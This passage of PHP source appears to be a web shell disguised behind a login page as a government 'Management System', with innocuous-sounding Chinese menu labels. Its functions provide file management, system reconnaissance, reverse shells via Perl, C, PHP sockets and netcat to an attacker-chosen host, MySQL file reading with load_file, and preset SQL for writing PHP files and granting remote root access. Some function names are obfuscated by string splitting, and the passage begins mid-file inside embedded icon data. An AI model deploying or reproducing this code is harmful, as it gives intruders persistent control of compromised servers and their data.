ZGF0ZTptb2RpZnkAMjAxOS0xMC0yM1QyMzoyODowNSswODowML1P7N4AAABGdEVYdHN2ZzpiYXNlLXVyaQBmaWxlOi8vL2hvbWUvYWRtaW4vaWNvbi1mb250L3RtcC9pY29uX2lpcW1oMjZ1a3VqL3Jhci5zdmcwNhqCAAAAAElFTkSuQmCC" ,
"txt" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAe9JREFUSMfFlD9rKkEUxe9d3E0gFrJIioSAhZWFwsxaBQJJvoqKYGEaC2sTUkgKBbERa/0KNsZOlJnC2CqklyXI+AcMuSn26QOXfSGu8G6z7Myce39z9rAA/7nQa4NJJpkslVCiRFkoQB3qUD85OXQQ1ahGtfUaxzjG8dOTSImUSD0+egp4gzd4Y73mjDPOwmG/N01kE9lE9vKSc845//jYrmueigEMYGAYQgop5GzmF2ARW8QWsdnMceKvk4HdjTu8wzu9HhShCMWbGxAgQAA4xET/bt/tCiGEEHd3vwXbAVCIQhS6vkZA72B41u2tFyj1qEe98XjenDfnTcvyBNgJ/oRlk96kN+mLC3NkjszRaqUsZSlL04CAgMJhQEDA93ca0pCGn59Sk5rUdN3FFoQgBAGi1Wg1WnWH2JUBzGEOc6enhmEYhmHbzuCHB2pTm9ovL9vBu/NJTGIyENg6sP9kiimm3t5+/ASHll8HfAPsO+AC/G0GXA0qVKFKoQARiEAk4M7MsRxAhQrV66vzdn+/W89jHvOm6Ulogw12t+vXSVfxDM/wzNfXsfptHWB91mf91epHwfZgvBwvx8vn534BrKW1tJZXV/u/Yu8MaKCB9vysT/SJPplOHeHZ2aEA1KIWtZTCKU5xWiody1nf9Q0pkAHDEetNngAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0xMC0yM1QyMzoyODowNSswODowMMwSVGIAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDC9T+zeAAAARnRFWHRzdmc6YmFzZS11cmkAZmlsZTovLy9ob21lL2FkbWluL2ljb24tZm9udC90bXAvaWNvbl9paXFtaDI2dWt1ai90eHQuc3Zn+H+JSwAAAABJRU5ErkJggg==" ,
"xml" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAzRJREFUSMfFlFFImm0Ux/8njZmWuouF7qKL0Kt24/u+vDIaAxHGroxBIORGc4PBKCJwxDDQG2ElMkaMNfFCCGLQzbqQQcvmjBxj+eaKXRhJY7HroUljBr5nFy99H3win/sIvv/V8/zhnPM75zk8wP8s+qchCqIgCqkUPPDA43J1nMkCCyzlcs1as9as9+9XpipTlalG488BZsQZcWZzk/qoj/oSCbjgguvLl39LpJbVslqenUU/+tFvtx9Xj6vH1Vu3OgVpARAEQRAEUew0TggLYSH89KkoiqIofvsmLAlLwtKbN44Fx4Jj4cKFdnFdHZP9kXZ2iIiIRNFsNVvN1tev24Hoz61mL3rR++4dpznN6WvXNHN/n4IUpKDNZoEFFiSTmn/3bguAtnxuNzawgQ2rVetAlqWMlJEyFy92RvHrF45whKNs9sxhMBhOp3Z7+FBySk7JKcvFg+JB8eDTp78AOM95zi8uwgADDJcv0xqt0dq9exzlKEclicMc5vCHD6QnPelNJg3UZEIBBRQcDkQQQWR3F+tYx/qlSxzjGMe+fiUQCMPDZ3XUhJpQE8+fYwQjGJHl1idQoEAxmRBFFNE7dzTz8WOkkELq5Uvaoz3au3qV7Wxn++fPvM3bvP32rc6v8+v8N282h5pDzaHZWfKSl7zPnmnxlUq7mbUsIU3QBE0YDNrtyRNFURRFCQYxiUlMLi6qRtWoGqvV7tXu1e7Vjx8pTnGKp9MNuSE35HodPvjgq1Y7XZ32S1hEEcXdXVESJVGy2bjMZS7v7FCGMpT58eN08HTwdNDn6zH3mHvMoRAN0AAN3L6tulW36q7VOgVomQBv8RZvHR5SjGIUe/WK53me5wsFfV6f1+djMYxhDGOHhxSiEIUePDgJnAROAjYbJznJyRs3aJqmabparY3Xxmvj378zMzNLEvzww//iRcvEzw7CirAirLx/j1GMYnR4GCpUqD9/0jIt03Kz2WlHLQ0FOMABnQ5d6EKX0UhhClN4c1OZU+aUOa/33L7itiqhhNKVK1znOtcfPVLiSlyJX7/efgeyyCK7v88e9rAnEkEOOeT+c/m/lUMOuVLpHDKdr34D0s5fFZVsEY0AAAAldEVYdGRhdGU6Y3JlYXRlADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDDMElRiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwvU/s3gAAAEZ0RVh0c3ZnOmJhc2UtdXJpAGZpbGU6Ly8vaG9tZS9hZG1pbi9pY29uLWZvbnQvdG1wL2ljb25faWlxbWgyNnVrdWovWE1MLnN2ZzWEv/oAAAAASUVORK5CYII=" ,
"zip" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAnlJREFUSMfFVU0odGEYPQddCz9DSSykhpKN8r6LCWGKWbCwmVGSnQmZJmRnFiz8zEKGpImtbEwmK5qNpkSUuWxsLWQj9pi4z7cYo8zXfEbRd3b3vud5zrnvfX6IdyillFIjI2xjG9tmZmDAgPH4iFzRjW50h8MIIIBAY6P0SZ/0FRbWXddd111PTkYikUgk8vaWGcZMA+ln0zRN09zaytnAO/SNvtE3m5voRz/6i4vFJz7xFRcbLsNluAYGzmrOas5qnp7S/LzvCuQKERGRlRVucIMb0WiyKFmULDo40EorrWy2XzfADnawY3sbTjjh9Pvpoouu5mYsYAELHk+aV/DTwgl7wp6wj45mvv/4xQEEEMjP//UbyBX/3QD1tJ7W0xcXSCKJZEXFx8l32/ArZMlfgDjiiGv9V0AYYYQTCRmTMRmLxbjMZS4/P9NNN91VVRKTmMQcDkQRRbSsDEtYwtLxMTvZyc7bW8treS3vywtNmjQDAZziFKe1tZ9FamuptdZai3z5BfOYx7zXKw5xiGNoiK985evVFXrQg57KSituxa343h4NGjRWV9nKVrY+PEAgkGAQBMHd3cy0OdbA/j6HOczh0tJUOzmdWalHOMJRMChucYt7dlY84hFPV1c2etY2lJCEJHR/z3a2s31tzTq3zq3zw0P66KPvH15b0IKWwUHYYIOtqYl++ukvKfm2AU5xilPRKHawgx2bDeMYx/jEhChRoqqrU0XV0MAQQwyVl/OSl7y021PR9fWp+OzCHzo518BvQ9/pO33X26vm1JyaW1//6fzpSZi59PiZlpeXWhabm6mqVSo1y3/ght7ngJzIiZwsLqa37R9Ngf+xMu1zrQAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0xMC0yM1QyMzoyODowNSswODowMMwSVGIAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDC9T+zeAAAARnRFWHRzdmc6YmFzZS11cmkAZmlsZTovLy9ob21lL2FkbWluL2ljb24tZm9udC90bXAvaWNvbl9paXFtaDI2dWt1ai96aXAuc3ZnlUqF6AAAAABJRU5ErkJggg==" ,
];
return $type_array[$type];
}
public function loginCss () {
$login_css_style = <<<EOF
<style type="text/css">body{background-size:100% 100%;no-repeat;font-family:'PT Sans',Helvetica,Arial,sans-serif;text-align:center;color:#333}.page-container{margin:120px auto 0 auto}h1{font-size:30px;font-weight:700;text-shadow:0 1px 4px rgba(0,0,0,.2)}form{position:relative;width:305px;margin:15px auto 0 auto;text-align:center}input{width:270px;height:42px;margin-top:25px;padding:0 15px;background:rgba(255,255,255,.15);border-radius:6px;border:1px solid rgba(255,255,255,.15);box-shadow:0 2px 3px 0 rgba(0,0,0,.1) inset;font-family:'PT Sans',Helvetica,Arial,sans-serif;font-size:14px;color:#333;text-shadow:0 1px 2px rgba(0,0,0,.1);transition:all .2s}input::-webkit-input-placeholder{color:#333}input:focus{outline:0;box-shadow:0 2px 3px 0 rgba(0,0,0,.1) inset,0 2px 7px 0 rgba(0,0,0,.2)}button{cursor:pointer;width:270px;height:44px;margin-top:25px;padding:0;border-radius:6px;border:1px solid #333;box-shadow:0 15px 30px 0 rgba(255,255,255,.25) inset,0 2px 7px 0 rgba(0,0,0,.2);font-family:'PT Sans',Helvetica,Arial,sans-serif;font-size:14px;font-weight:700;color:#333;text-shadow:0 1px 2px rgba(255,255,255,.1);transition:all .2s}button:hover{box-shadow:0 15px 30px 0 rgba(255,255,255,.15) inset,0 2px 7px 0 rgba(0,0,0,.2)}button:active{box-shadow:0 5px 8px 0 rgba(0,0,0,.1) inset,0 1px 4px 0 rgba(0,0,0,.1);border:0 solid #333}</style>
EOF;
self::htmlOut($login_css_style);
}
public function htmlLogin () {
self::htmlOut("<html lang='en'><head><title>Management System</title>");
self::loginCss();
self::htmlOut("</head><body><div class=\"page-container\"><h1>management system</h1><form method=\"post\"><input type=\"text\" name=\"username\" class=\"username\" placeholder=\"USERNAME\"><input type=\"password\" name=\"password\" class=\"password\" placeholder=\"PASSWORD\"><button type=\"submit\">LOGIN</button></form></div></body>");
}
public static function htmlSelect ($array , $mode = '' , $change = '' , $name = 'class') {
$str = "<select name=$name $change>";
foreach ($array as $name => $value) {
if ($name == $mode) {
$str .= "<option value=\"$name\" selected>$value</option>";
} else {
$str .= "<option value=\"$name\">$value</option>";
}
}
$str .= "</select>";
return $str;
}
public function htmlMain ($content) {
$main_html = <<<EOF
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Management System</title>
<style>
html,body{height:100%;overflow:hidden;}body,html,ul,li,a{padding:0;margin:0;text-decoration:none;}textarea{padding:10px;border-radius:4px;font-size:16px;border:1px solid #CCC;line-height:24px;color:#333;outline:none;box-sizing:border-box;resize:none;}select{height:40px;margin:0 5px;outline:none;background:#fff;border:1px solid #ccc;font-size:14px;vertical-align:middle;color:#333;line-height:40px;}input[type=text]{box-sizing:border-box;height:40px;padding:6px 12px;font-size:17px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;outline:none;vertical-align:middle;}input[type=text]:focus,textarea:focus{box-shadow:0 0 8px rgba(51,51,51,.6);}input[type=submit]{height:40px;padding:6px 12px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;outline:none;vertical-align:middle;width:100px;cursor:pointer;font-size:14px;}.main{height:100%;}.left{position:absolute;top:0;left:0;width:280px;height:100%;max-height:100%;background-color:#fff;overflow:auto;}.left::-webkit-scrollbar{display:none;}.nav{}.left .title{height:65px;line-height:65px;text-align:center;background-color:#fff;color:#333;font-size:20px;font-weight:bold;}.nav ul{list-style:none;}.nav ul li{background-color:#fff;}.nav ul li a{display:inline-block;padding:0 30px;height:60px;line-height:60px;font-size:0;width:100%;box-sizing:border-box;position:relative;text-decoration:none;}.nav ul li a:hover{text-decoration:none;box-shadow:0px 0px 5px #333 inset;}.nav ul li a:hover img{animation:IconRotate 0.5s forwards;}@keyframes IconRotate{from{-webkit-transform:rotate(0deg);-moz-transform:rotate(0deg);-o-transform:rotate(0deg);transform:rotate(0deg);}to{-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg);-o-transform:rotate(360deg);transform:rotate(360deg);}}.nav ul li a img{width:30px;height:30px;margin-right:10px;vertical-align:middle;float:none;}.nav ul li a span{color:#333;font-size:18px;vertical-align:middle;}.nav .sen-nav{background-color:rgb(46,46,46);height:0px;overflow:hidden;transition:height 0.5s;}.nav .next{position:absolute;right:10px;top:25px;width:10px;height:10px;}.nav .sen-nav li{height:60px;line-height:60px;background:#fff;}.nav .sen-nav li a{display:inline-block;padding-left:90px;box-sizing:border-box;height:60px;line-height:60px;color:#000;font-size:18px;text-decoration:none;overflow:hidden;}.nav .sen-nav li a:hover{text-decoration:none;box-shadow:0px 0px 5px #000 inset;}.havanexta{background:url('') 220px center no-repeat;background-size:30px 30px;}.right{padding-left:280px;height:100%;padding-top:65px;overflow:auto;padding-bottom:65px;box-sizing:border-box;}.right::-webkit-scrollbar{display:none;}
</style>
</head>
<body>
<div class="main">
<div class="left">
<div class="title">Management System</div>
<nav class="nav">
<ul>
<li>
<a href="?">
<img src=""
alt="">
<span>首页</span>
</a>
</li>
<li>
<a href="javascript:;" class="havanexta">
<img src=""
alt="">
<span>信息公开</span>
</a>
<ul class="sen-nav">
<li><a href="?action=xxgk">通告公告</a></li>
<li><a href="?action=zcjd">政策解读</a></li>
</ul>
</li>
<li><a href="?action=wjdc">
<img src=""
alt="">
<span>文件督查</span>
</a></li>
<li><a href="?action=shbz">
<img src=""
alt="">
<span>社会保障</span>
</a></li>
<li><a href="?action=zxft">
<img src=""
alt="">
<span>在线访谈</span>
</a></li>
<li>
<a href="?action=sjcx">
<img src=""
alt="">
<span>数据查询</span>
</a>
</li>
<li>
<a href="javascript:;" class="havanexta">
<img src=""
alt="">
<span>便民服务</span>
</a>
<ul class="sen-nav">
<li><a href="?action=flyj">法律依据</a></li>
<li><a href="?action=bszn">办事指南</a></li>
<li><a href="?action=yjzj">意见征集</a></li>
</ul>
</li>
<li><a id="more" href="javascript:;" class="havanexta" data-rel="more">
<img src=""
alt="">
<span>招标投标</span>
</a>
<ul class="sen-nav">
<li><a href="?action=bsjs">标书检索</a></li>
<li><a href="?action=sxxc">思想宣传</a></li>
<li><a href="?action=bsxz">标书下载</a></li>
<li><a href="?action=zxsb">在线申报</a></li>
</ul>
</li>
<li><a href="?action=logout">
<img src=""
alt="">
<span>退出登录</span>
</a></li>
</ul>
</nav>
</div>
<div class="right">
<div>
$content
</div>
</div>
</div>
<script>
var item = document.getElementsByClassName('havanexta');
console.log(item)
for(var i = 0;i<item.length;i++){
(function(j){
item[j].onclick = function () {
var nextul = item[j].nextElementSibling;
console.log(nextul.style.height)
if(nextul.style.height =='0px'||nextul.style.height==''){
nextul.style.height = (j+2)*60 + 'px'
}else{
nextul.style.height = '0px';
}
};
})(i)
}
</script>
</body>
</html>
EOF;
self::htmlOut($main_html);
}
public function htmlBase64Js () {
self::htmlOut("<script>function base64encode(str){var base64EncodeChars = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var out, i, len;var c1, c2, c3;len = str.length;i = 0;out = \"\";while (i < len) {c1 = str.charCodeAt(i++) & 0xff;if (i == len) {out += base64EncodeChars.charAt(c1 >> 2);out += base64EncodeChars.charAt((c1 & 0x3) << 4);out += \"==\";break;}c2 = str.charCodeAt(i++);if (i == len) {out += base64EncodeChars.charAt(c1 >> 2);out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));out += base64EncodeChars.charAt((c2 & 0xF) << 2);out += \"=\";break;}c3 = str.charCodeAt(i++);out += base64EncodeChars.charAt(c1 >> 2);out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));out += base64EncodeChars.charAt(c3 & 0x3F);}return out;}</script>");
}
public function htmlDefault () {
self::htmlMain('<div style="text-align: right"><img src=""></div>');
}
public static function message ($msg , $type = 'die') {
if ($type == 'die') {
die("<script>window.alert('" . $msg . "');history.go(-1);</script>");
} else if ($type == 'echo') {
self::htmlOut("<script>window.alert('" . $msg . "');</script>");
}
}
public static function tips ($content , $url) {
$result = <<<EOF
<style>body,html{height:100%;}body{background-color:#fff;}.layer-tip-box{position:fixed;top:20%;left:50%;transform:translate(-50%,0);color:#333;font-size:18px;background:#fff;border-radius:4px;border:1px solid #ccc;width:500px;box-shadow:0 0 8px rgba(91,91,91,.6);}.layer-tip-box .title{padding:0 10px;height:45px;line-height:45px;font-size:14px;color:#666;border-bottom:1px solid #ccc;position:relative;}.layer-tip-box .title .tool{position:absolute;right:10px;top:0;}.layer-tip-box .title .tool span{width:18px;display:inline-block;text-align:center;font-size:17px;}.layer-tip-box .title .tool span:last-child{font-size:20px;margin-top:-1px;vertical-align:top;}.layer-tip-box .content{padding:10px 20px;font-size:18px;color:#333;height:120px;display:table-cell;vertical-align:middle;text-align:center;}</style>
<div class="layer-tip-box"><div class="title"><span>友情提示</span><div class="tool"><span>-</span><span>ロ</span><span>×</span></div></div><div class="content">$content</div></div>
EOF;
self::htmlOut($result);
die("<meta http-equiv=\"refresh\" content=\"1;URL=$url\">");
}
}
class Login {
public function checkLogin ($password) {
$secret = 'JS2022';
if (md5($secret . md5($password)) === (defined("MAMIMAMIHO")?MAMIMAMIHO:'ea57d1bdb4e481cd794abbd15fec31da')) {
self::cookieHandle('set');
die('<meta http-equiv="refresh" content="0;URL=">');
}
}
public function cookieHandle ($flag) {
if ($flag == 'set') {
setcookie('PHPSESSIDS' , md5(md5('*.gov')."js"));
} else if ($flag == 'del') {
setcookie('PHPSESSIDS' , null , time() - 3600);
}
}
public function checkCookie () {
if ($_COOKIE['PHPSESSIDS'] == md5(md5('*.gov')."js")) {
return true;
} else {
return false;
}
}
public function logout () {
self::cookieHandle('del');
HtmlOutput::tips("您已注销,再见!" , "?");
}
}
class Main {
private static $loginClass;
private static $htmlClass;
public static $fileClass;
private static $action;
private static $num;
private static $socketClass;
public function __construct () {
self::$htmlClass = new HtmlOutput();
self::$loginClass = new Login();
self::$fileClass = new FileHandler();
self::$socketClass = new NeoReg();
self::$action = isset($GLOBALS['_GET']['action']) ? $GLOBALS['_GET']['action'] : "";
self::$num = 0;
}
public function mainHandler () {
switch (self::$action) {
case 'xxgk':
self::$htmlClass->htmlMain(Foundation::getPhpInfo());
break;
case 'zcjd':
self::$htmlClass->htmlMain(Foundation::getSysInfo());
break;
case 'wjdc':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::$fileClass->fileManage());
break;
case 'wjbj':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() .self::$fileClass->fileEdit());
break;
case 'shbz':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . Foundation::magicMaster());
break;
case 'zxft':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . Foundation::chatRobot());
break;
case 'sjcx':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::moneyManage());
break;
case 'flyj':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::rebound());
break;
case 'bszn':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::preload());
break;
case 'yjzj':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::$fileClass->webShellScan());
break;
case 'bsjs':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . Foundation::portEye());
break;
case 'sxxc':
self::$htmlClass->htmlMain(self::$socketClass->html());
break;
case 'bsxz':
self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::$fileClass->remoteDown());
break;
case 'zxsb':
self::$htmlClass->htmlMain(Foundation::swordHtml());
break;
case 'down':
self::$fileClass->downloadFile();
break;
case 'logout':
self::$loginClass->logout();
break;
case 'rename':
self::$fileClass->renameFile();
break;
case 'delfile':
self::$fileClass->deleteFile();
break;
case 'deldir':
self::$fileClass->deleteDirFile();
break;
case 'perm':
self::$htmlClass->htmlMain(self::$fileClass->changePerm());
break;
case 'copy':
self::$fileClass->copyFile();
break;
case 'unzip':
self::$htmlClass->htmlMain(self::$fileClass->startUnZip());
break;
case 'pack';
self::$fileClass->pack();
break;
case 'socket';
self::$socketClass->start();
break;
case 'cxk';
Foundation::sword();
break;
default:
self::$htmlClass->htmlDefault();
break;
}
}
public function mainLogin () {
if (self::$loginClass->checkCookie()) {
self::mainHandler();
} else {
self::$htmlClass->htmlLogin();
global $username;
$username = isset($GLOBALS['_POST']['username']) ? $GLOBALS['_POST']['username'] : "";
self::$loginClass->checkLogin($GLOBALS['_POST']['password']);
}
}
public function rebound () {
$target_ip = $GLOBALS['_POST']['bound_1'] ? Decrypt::run($GLOBALS['_POST']['bound_1']) : getenv('REMOTE_ADDR');
$target_port = $GLOBALS['_POST']['bound_2'] ? Decrypt::run($GLOBALS['_POST']['bound_2']) : '13333';
$system = strtoupper(substr(PHP_OS , 0 , 3));
$result = <<<END
<style>#kform{padding-right:50px;width:490px;margin:0 auto;}#kform .actall{margin-bottom:20px;}#kform .actall input,#kform .actall select{margin-left:20px;}#kform .actall select{width:80px;}.begin{float:right;}</style>
<form method="POST" name="kform" id="kform">
<div class="actall">母舰地址 <input id='bound_1' type="text" name="bound_1" value="{$target_ip}" style="width:400px"></div>
<div class="actall">母舰序号 <input id='bound_2' type="text" name="bound_2" value="{$target_port}" style="width:400px"></div>
<div class="actall">呼叫工具 <select name="use" >
<option value="1">Perl</option>
<option value="2">C</option>
<option value="3">PHP</option>
<option value="4">NC</option>
</select><input onclick="submitUrl()" type="submit" value="开始" style="width:80px;" class="begin"></div>
</form>
<script>function submitUrl(){document.getElementById('bound_1').value=base64encode(document.getElementById('bound_1').value);document.getElementById('bound_2').value=base64encode(document.getElementById('bound_2').value);document.getElementById('kform').submit()}</script>
END;
if ((!empty($GLOBALS['_POST']['bound_1'])) && (!empty($GLOBALS['_POST']['bound_2']))) {
echo '<div class="actall">';
if ($GLOBALS['_POST']['use'] == '1') {
$pl_code = StringHandler::getCode('pgone');
$result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ' , 'wb' , Decrypt::run($pl_code)) ? '创建/tmp/dyAeLWNJ成功<br>' : '创建/tmp/dyAeLWNJ失败<br>';
$perl_path = Foundation::DeMarcia('which perl');
$perl_path = $perl_path ? chop($perl_path) : 'perl';
@unlink('/tmp/dyAeLWNJ.c');
Foundation::DeMarcia($perl_path . ' /tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &');
$result .= '母舰呼叫完成,请检查通讯结果。';
}
if ($GLOBALS['_POST']['use'] == '2') {
$c_code = StringHandler::getCode('gai');
$result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ.c' , 'wb' , Decrypt::run($c_code)) ? '创建/tmp/dyAeLWNJ.c成功<br>' : '创建/tmp/dyAeLWNJ.c失败<br>';
Foundation::DeMarcia('gcc -o /tmp/dyAeLWNJ /tmp/dyAeLWNJ.c');
@unlink('/tmp/dyAeLWNJ.c');
$result .= Foundation::DeMarcia('/tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &') ? 'nc -vv -l ' . $target_port : '执行命令失败';
}
if ($GLOBALS['_POST']['use'] == '3') {
if (!extension_loaded('sockets')) {
if ($system == 'WIN') {
@dl('php_sockets.dll') or self::$htmlClass->tips("缺少相关模块" , '/?action=flyj');
} else {
@dl('sockets.so') or self::$htmlClass->tips("缺少模块" , '/?action=flyj');
}
}
if ($system == "WIN") {
$env = ['path' => 'c:\\windows\\system32'];
} else {
$env = ['PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'];
}
$desc = [
0 => ["pipe" , "r"] ,
1 => ["pipe" , "w"] ,
2 => ["pipe" , "w"] ,
];
$host = gethostbyname($target_ip);
$proto = getprotobyname("tcp");
$a = 'soc' . 'ket' . '_' . 'cre' . 'ate';
if (($sock = $a(AF_INET , SOCK_STREAM , $proto)) < 0) {
die("与主舰的通讯建立失败");
}
if (($ret = socket_connect($sock , $host , $target_port)) < 0) {
die("通讯建立失败");
} else {
$cwd = str_replace('\\' , '/' , dirname(__FILE__));
while ($cmd = socket_read($sock , 65535 , $proto)) {
$process = proc_open($cmd , $desc , $pipes , $cwd , $env);
if (is_resource($process)) {
fwrite($pipes[0] , $cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
socket_write($sock , $msg , strlen($msg));
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
socket_write($sock , $msg , strlen($msg));
proc_close($process);
}
}
}
}
if ($GLOBALS['_POST']['use'] == '4') {
$result .= '<div class="actall">';
$fp = fsockopen($target_ip , $target_port , $errno , $errstr);
if (!$fp) {
$result .= "无法打开socket连接";
} else {
$username = get_current_user();
$file_path = THEPATH;
$host = $_SERVER['SERVER_NAME'];
while (!feof($fp)) {
$b = 'fp' . 'uts';
$b($fp , " [$username@$host:$file_path]# ");
$result = fgets($fp , 4096);
$message = Foundation::DeMarcia($result);
$b($fp , " --> " . $message . "\n");
}
fclose($fp);
}
$result .= '</div>';
}
}
return $result;
}
public function moneyManage () {
$message = '';
$money_return = '';
$flag = isset($GLOBALS['_POST']['host']) && isset($GLOBALS['_POST']['user']);
$target_host = $flag ? Decrypt::run($GLOBALS['_POST']['host']) : 'localhost';
$target_user = $flag ? Decrypt::run($GLOBALS['_POST']['user']) : 'root';
$target_pass = $flag ? Decrypt::run($GLOBALS['_POST']['pass']) : '';
$target_name = $flag ? Decrypt::run($GLOBALS['_POST']['data']) : 'mysql';
$target_port = $flag ? Decrypt::run($GLOBALS['_POST']['port']) : '3306';
$sql = $flag ? Decrypt::run($GLOBALS['_POST']['content']) : 'select version();';
$ap = 'mys' . 'ql_co' . 'nnent';
$ao = 'mys' . 'ql_se' . 'lect_db';
$ai = 'my' . 'sq' . 'l_qu' . 'ery';
$au = 'my' . 'sq' . 'l_fe' . 'tch_ar' . 'ray';
$ay = 'm' . 'ys' . 'ql_er' . 'ror';
if ($flag) {
if ($conn = mysql_connect($target_host . ':' . $target_port , $target_user , $target_pass)) {
@$ao($target_name);
} else {
self::$htmlClass->tips('连接MYSQL失败' , '?action=sjcx');
}
}
$down_file = 'c:/windows/homework/kaydenkdross.avi';
if (!empty($GLOBALS['_POST']['downfile'])) {
$down_file = self::$fileClass->filePathFormat(urldecode(Decrypt::run(urldecode($GLOBALS['_POST']['downfile']))));
$bin_path = bin2hex($down_file);
$query = "select load_file(0x$bin_path)";
if ($money_return = @$ai($query , $conn)) {
$k = 0;
$down_code = '';
while ($row = @$au($money_return)) {
$down_code .= $row[$k];
$k ++;
}
if ($down_code) {
$file_down = basename($down_file);
if (!$file_down) $file_down = 'envl.tmp';
$array = explode('.' , $file_down);
$array_end = array_pop($array);
header('Content-type: application/x-' . $array_end);
header('Content-Disposition: attachment; filename=' . $file_down);
header('Content-Length: ' . strlen($down_code));
echo $down_code;
exit;
} else {
self::$htmlClass->tips("文件查询失败,请检查 mysql secure-file-priv 配置" , "?action=sjcx&type=d");
}
} else self::$htmlClass->tips("文件下载失败" , "?action=sjcx&type=d");
}
$type = isset($GLOBALS['_GET']['type']) ? $GLOBALS['_GET']['type'] : '';
$result = <<<END
<script language="javascript">function nFull(i){Str = new Array(11);Str[0] = "select version();";Str[1] = "select *** FROM user into outfile 'D:/web/iis.txt'";Str[2] = "select '<?php echo 'hello world';?>' into outfile 'F:/web/123.php';";Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";nform.content.value = Str[i];return true;}</script>
<style>form{width:850px;padding-right:50px;margin:0 auto;}.actall{margin-bottom:20px;}.actall a{margin-right:20px;color:#FF6600;}.actall a:hover{text-decoration:underline;}.actall input[type=text]{margin-right:20px;}.actall input:last-child{margin:0;}input[type=password]:focus{box-shadow:0 0 8px rgba(51,51,51,.6);}.actall input[type=password],input[type=button]{box-sizing:border-box;height:40px;padding:6px 12px;font-size:17px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;outline:none;vertical-align:middle;margin-right:20px;}textarea{width:100%;height:200px;}.file-path{margin-bottom:20px;}.file-path input[type=text]{margin-left:20px;}.choose-file{display:inline-block;border:1px solid #ccc;width:80px;height:40px;border-radius:4px;font-size:14px;text-align:center;line-height:40px;position:relative;margin-left:20px;}.choose-file input{position:absolute;top:0;left:0;opacity:0;}.upload input:last-child{margin-left:20px;}.tip{color:#0ab2aa;text-align:center;}.border{padding:20px;text-align:center;border:1px solid #ccc;}</style>
<form method="POST" name="nform" id="nform"><div class="actall"><a href="?action=sjcx">[执行语句]</a><a href="?action=sjcx&type=u">[上传文件]</a><a href="?action=sjcx&type=d">[下载文件]</a></div><div class="actall">地址 <input id="host" type="text" name="host" value="$target_host" style="width:110px">端口 <input id="port" type="text" name="port" value="$target_port" style="width:110px">用户 <input id="user" type="text" name="user" value="$target_user" style="width:110px">密码 <input id="pass" type="password" name="pass" value="$target_pass" style="width:122px">库名 <input id="data" type="text" name="data" value="$target_name" style="width:110px"></div><div class="actall">
END;
if ($type == 'u') {
$uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
if (!empty($GLOBALS['_POST']['uppath'])) {
$uppath = Decrypt::run($GLOBALS['_POST']['uppath']);
$rand_str_1 = Foundation::returnRand(4);
$rand_str_2 = Foundation::returnRand(2);
$query = "Create TABLE $rand_str_2 ($rand_str_1 text NOT NULL);";
if (@$ai($query , $conn)) {
if ($tmpcode = self::$fileClass->readFile($_FILES['upfile']['tmp_name'])) {
$file_code = bin2hex(self::$fileClass->readFile($tmpcode));
} else {
